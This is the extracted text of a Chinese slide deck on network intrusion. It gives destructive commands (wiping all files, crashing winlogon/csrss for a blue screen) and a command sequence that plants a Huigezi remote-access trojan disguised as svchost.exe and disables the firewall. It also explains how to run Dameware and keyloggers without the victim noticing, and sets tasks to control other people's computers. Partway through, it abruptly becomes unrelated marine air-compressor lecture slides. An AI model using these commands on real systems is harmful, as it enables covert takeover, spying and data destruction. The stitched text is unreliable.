网络安全攻防技术教程

网络入侵基础知识、

入侵实战第2章QQ：594520163Email：aizhihuo218@163.com章节目标常用的DOS命令常用的入侵命令

Hack实战一：命令行下的入侵

Hack实战二：图形界面的入侵流行远程控制木马的使用方法键盘记录程序的使用方法Page2常用DOS命令1Cd切换目录Dir列出所有文件信息Del删除文件Md创建目录Rd删除目录Copy复制Xcopy复制文件和文件夹Cls清屏Attrib修改文件、文件夹属性Date、Time显示日期、时间Page3常用DOS命令2Path系统路径Set显示、设置系统信息Ren(Rename)重命名Subst虚拟磁盘Ver显示操作系统版本Help帮助/?显示某条命令的帮助Page4非主流DOS命令11.重复执行某条命令直至死机的批处理代码： startcmd %02.复制一个文件的磁盘的每个子文件夹当中： for/r/d%ain(*)docopytest.txt"%a"/y3.不停地执行同一条命令： for/l%ain(1,0,2)donetsend"炸弹来了！"4.死机,蓝屏 ntsd-cq-pnwinlogon.exe ntsd-cq-pncsrss.exePage5非主流DOS命令25.删除磁盘所有文件： del*/a/s/q/f6.创建名字为空的文件夹： md(按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车)7.创建无法删除的特殊名字文件夹： md\\.\c:\con md\\.\c:\aux8.创建无法双击打开无法删除的另类文件夹： mdtest..\ rdtest..\/s/dPage6常用入侵命令1netuser用户名密码/add(建立用户)netlocalgroupadministrators用户名密码/add(将用户加到管理员，使其拥有管理权限)netuserguest/active:Yes(激活guest用户)netuserguest12345(修改guest密码为12345)netuser(查看账号属性)netuse\\ip\ipc$“”/user(建立空IPC连接)netuse\\ip\ipc$“密码”/user:“用户名”(建立IPC非空连接，非空链接就是需要帐户和密码)netuse\\ip\ipc$/del(删除IPC空连接)netusez:\\\c$(映射目标主机磁盘c盘到本地磁盘Z盘)Page7常用入侵命令2netstart(查看开启了哪些服务)netstart服务名(开启服务)nettime\\目标IP(查看对方时间)netview(查看局域网中开启了哪些共享)netshare(查看本地开启的哪些共享)netshareC$/del(删除C盘默认共享)netstat-an(查看计算机开放了哪些端口)Copyxx.exe\\ip\admin$\System32(将当前xx.exe复制到对方Admin$共享的System32目录内)Page8常用入侵命令3scconfigtlnesvrstart=auto(修改telnet服务的启动方式为自动，auto前面有一个空格)netstopsharedaccess(关闭系统自带的防火墙)netsendIP消息(利用messenger服务向目标IP发送消息)ntsd-cq-pnwinlogon.exe(蓝屏重启)ntsd-cq-pncsrss.exe(死机)tasklist(查看进程)taskkill(结束进程)Page9实战：纯DOS命令入侵netuse\\0\ipc$“123”/user:”administrator”nettime\\0Copyc:\server.exe\\0\admin$\svchost.exeAt\\012:00startc:\windows\svchost.exe这样，对方就中了灰鸽子服务端了。Page10几个小例子开启禁用的telnet服务：

scconfigtlntsvrstart=auto(auto前有空格)开启3389远程终端

regadd开启C盘默认共享

netsharec$=c:开启计划任务服务（at命令需要这一服务） netstartschedule开启远程注册表(RemoteRegistry)服务

netstartremoteregistryPage11图形界面入侵一、计算机管理 操作菜单

连接到另一台计算机二、注册表编辑器 文件菜单

连接网络注册表三、第三方工具比如Dameware、PcanywhereDameware的使用方法Page12Dameware的隐藏用Dameware控制对方，要做到悄无声息，需要注意以下几点：点帮助菜单

激活软件，输入注册码注册软件；在远程连接对话框上单击“设置”，勾选： “查看模式”和“显示远程鼠标指针”；切换到“安装选项”选项卡，勾选上“复制配置文件”然后点“编辑”： 把“附加设置”选项卡上“允许托盘图标”勾掉 再把“通知对话”选项卡上“连接时通知”勾掉。Page13XP默认不能远程控制的原因在运行中输入命令secpol.msc打开安全策略展开“本地策略”

“安全选项”(红色表示默认选项)“安全选项：本地账户的共享和安全模式”经典，表示在远程可以拥有管理员权限仅来宾，表示在远程只能拥有guest权限“账户：使用空白密码的账户只允许进行控制台登录”启用，账户密码为空则不允许远程访问禁用，账户密码为空也允许远程访问所以，要想控制系统为XP的计算机，必须考虑对方安全策略的设置安全策略的设置不影响利用木马进行控制Page14灰鸽子以华夏灰鸽子2009为例，注意事项：IP地址栏一定要填写自己的IP地址，而且不要忘了加上冒号和端口号Page15PcShare使用方法和灰鸽子类似Page16键盘记录以“keyghost”和“简单键盘记录程序”为例Page17实验任务练习前面PPT中的DOS命令开一台2003虚拟机，利用命令入侵，以能够telnet到对方电脑为入侵成功的标志开一台2003虚拟机，利用图形界面入侵，以能够控制对方桌面为入侵成功的标志使用远控软件Dameware控制别人电脑 （要求：悄无声息，不能被对方发现）利用灰鸽子控制别人电脑

Page18第一节活塞式空压机的工作原理第二节活塞式空压机的结构和自动控制第三节活塞式空压机的管理复习思考题单击此处输入你的副标题，文字是您思想的提炼，为了最终演示发布的良好效果，请尽量言简意赅的阐述观点。第六章活塞式空气压缩机

piston-aircompressor压缩空气在船舶上的应用：

1.主机的启动、换向；

2.辅机的启动；

3.为气动装置提供气源；

4.为气动工具提供气源；

5.吹洗零部件和滤器。

排气量:单位时间内所排送的相当第一级吸气状态的空气体积。单位：m3/s、m3/min、m3/h第六章活塞式空气压缩机

piston-aircompressor空压机分类：按排气压力分：低压0.2～1.0MPa；中压1～10MPa；高压10～100MPa。按排气量分：微型<1m3/min；小型1～10m3/min；中型10～100m3/min；大型>100m3/min。第六章活塞式空气压缩机

piston-aircompressor第一节活塞式空压机的工作原理容积式压缩机按结构分为两大类：往复式与旋转式两级活塞式压缩机单级活塞压缩机活塞式压缩机膜片式压缩机旋转叶片式压缩机最长的使用寿命-

低转速（1460RPM），动件少（轴承与滑片），润滑油在机件间形成保护膜，防止磨损及泄漏，使空压机能够安静有效运作；平时有按规定做例行保养的JAGUAR滑片式空压机，至今使用十万小时以上，依然完好如初，按十万小时相当于每日以十小时运作计算，可长达33年之久。因此，将滑片式空压机比喻为一部终身机器实不为过。滑(叶)片式空压机可以365天连续运转并保证60000小时以上安全运转的空气压缩机1.进气2.开始压缩3.压缩中4.排气1.转子及机壳间成为压缩空间，当转子开始转动时，空气由机体进气端进入。2.转子转动使被吸入的空气转至机壳与转子间气密范围，同时停止进气。3.转子不断转动，气密范围变小，空气被压缩。4.被压缩的空气压力升高达到额定的压力后由排气端排出进入油气分离器内。4.被压缩的空气压力升高达到额定的压力后由排气端排出进入油气分离器内。1.进气2.开始压缩3.压缩中4.排气1.凸凹转子及机壳间成为压缩空间，当转子开始转动时，空气由机体进气端进入。2.转子转动使被吸入的空气转至机壳与转子间气密范围，同时停止进气。3.转子不断转动，气密范围变小，空气被压缩。螺杆式气体压缩机是世界上最先进、紧凑型、坚实、运行平稳，噪音低，是值得信赖的气体压缩机。螺杆式压缩机气路系统：

A

进气过滤器

B

空气进气阀

C

压缩机主机

D

单向阀

E

空气/油分离器

F

最小压力阀

G

后冷却器

H

带自动疏水器的水分离器油路系统：

J

油箱

K

恒温旁通阀

L

油冷却器

M

油过滤器

N

回油阀

O

断油阀冷冻系统：

P

冷冻压缩机

Q

冷凝器

R

热交换器

S

旁通系统

T

空气出口过滤器螺杆式压缩机涡旋式压缩机

涡旋式压缩机是20世纪90年代末期开发并问世的高科技压缩机，由于结构简单、零件少、效率高、可靠性好，尤其是其低噪声、长寿命等诸方面大大优于其它型式的压缩机，已经得到压缩机行业的关注和公认。被誉为“环保型压缩机”。由于涡旋式压缩机的独特设计，使其成为当今世界最节能压缩机。涡旋式压缩机主要运动件涡卷付，只有磨合没有磨损，因而寿命更长，被誉为免维修压缩机。

由于涡旋式压缩机运行平稳、振动小、工作环境安静，又被誉为“超静压缩机”。

涡旋式压缩机零部件少，只有四个运动部件,压缩机工作腔由相运动涡卷付形成多个相互封闭的镰形工作腔，当动涡卷作平动运动时，使镰形工作腔由大变小而达到压缩和排出压缩空气的目的。活塞式空气压缩机的外形第一节活塞式空压机的工作原理一、理论工作循环（单级压缩）工作循环：4—1—2—34—1吸气过程

1—2压缩过程

2—3排气过程第一节活塞式空压机的工作原理一、理论工作循环（单级压缩）

压缩分类：绝热压缩：1—2耗功最大等温压缩：1—2''耗功最小多变压缩：1—2'耗功居中功＝P×V（PV图上的面积）加强对气缸的冷却，省功、对气缸润滑有益。二、实际工作循环（单级压缩）1.不存在假设条件2.与理论循环不同的原因：1）余隙容积Vc的影响Vc不利的影响—残存的气体在活塞回行时，发生膨胀，使实际吸气行程（容积）减小。Vc有利的好处—

（1）形成气垫，利于活塞回行；（2）避免“液击”（空气结露）；（3）避免活塞、连杆热膨胀，松动发生相撞。第一节活塞式空压机的工作原理表征Vc的参数—相对容积C、容积系数λv合适的C：低压0.07-0.12

中压0.09-0.14

高压0.11-0.16

λv＝0.65—0.901）余隙容积Vc的影响C越大或压力比越高，则λv越小。保证Vc正常的措施：余隙高度见表6-1压铅法—保证要求的气缸垫厚度2.与理论循环不同的原因：二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理2）进排气阀及流道阻力的影响吸气过程压力损失使排气量减少程度，用压力系数λp表示：保证措施：合适的气阀升程及弹簧弹力、管路圆滑畅通、滤器干净。λp

（0.90-0.98）2.与理论循环不同的原因：二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理3）吸气预热的影响由于压缩过程中机件吸热，所以在吸气过程中，机件放热使吸入的气体温度升高，使吸气的比容减小，造成吸气量下降。预热损失用温度系数λt来衡量（0.90-0.95）。保证措施：加强对气缸、气缸盖的冷却，防止水垢和油污的形成。2.与理论循环不同的原因：二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理4）漏泄的影响内漏：排气阀（回漏）；外漏：吸气阀、活塞环、气缸垫。漏泄损失用气密系数λl来衡量（0.90-0.98）。保证措施：气阀的严密闭合，气缸与活塞、气缸与缸盖等部件的严密配合。5）气体流动惯性的影响当吸气管中的气流惯性方向与活塞吸气行程相反时，造成气缸压力较低，气体比容增大，吸气量下降。保证措施：合理的设计进气管长度，不得随意增减进气管的长度，保证滤器的清洁。2.与理论循环不同的原因：二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理上述五条原因使实际与理论循环不同。4）漏泄的影响5）气体流动惯性的影响1）余隙容积Vc的影响2）进排气阀及流道阻力的影响3）吸气预热的影响2.与理论循环不同的原因：二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理3.排气量和输气系数理论排气量Vt单位时间内活塞所扫过的气缸容积。实际排气量Q：Q=Vt

λ输气系数λ

：λ＝λtλv

λ

pλl漏泄的影响余隙容积Vc的影响进排气阀及流道阻力的影响吸气预热的影响二、实际工作循环（单级压缩）第一节活塞式空压机的工作原理指示功率pi

：按示功图计算的功率理论功率Ps、PT：按理论循环计算的功率

Ps(PT)<pi轴功率P：